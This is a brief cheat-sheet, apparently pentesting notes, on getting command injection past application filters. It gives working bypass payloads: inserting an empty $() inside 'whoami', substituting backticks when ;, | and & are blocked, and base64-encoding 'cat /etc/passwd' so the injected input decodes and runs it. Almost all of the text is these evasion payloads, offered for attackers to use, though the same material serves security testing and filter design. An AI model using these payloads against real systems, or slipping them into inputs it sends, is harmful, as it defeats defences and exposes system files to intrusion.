CMD Injection. How to bypass application protection mechanisms¶
if an application create command block list¶
we can use construction $() Command bellow returns the same results:
wh$()oami
whoami
if ;|& symbols are blocked¶
we can use ``
echo "Payload: `ls | wc -l`"
If separators or some commands are blocked¶
we can use base64 or xxd function Create payload in attacker machine
echo "cat /etc/passwd" | base64
Payload:
`echo "<resutl from command above>" | base64 -d`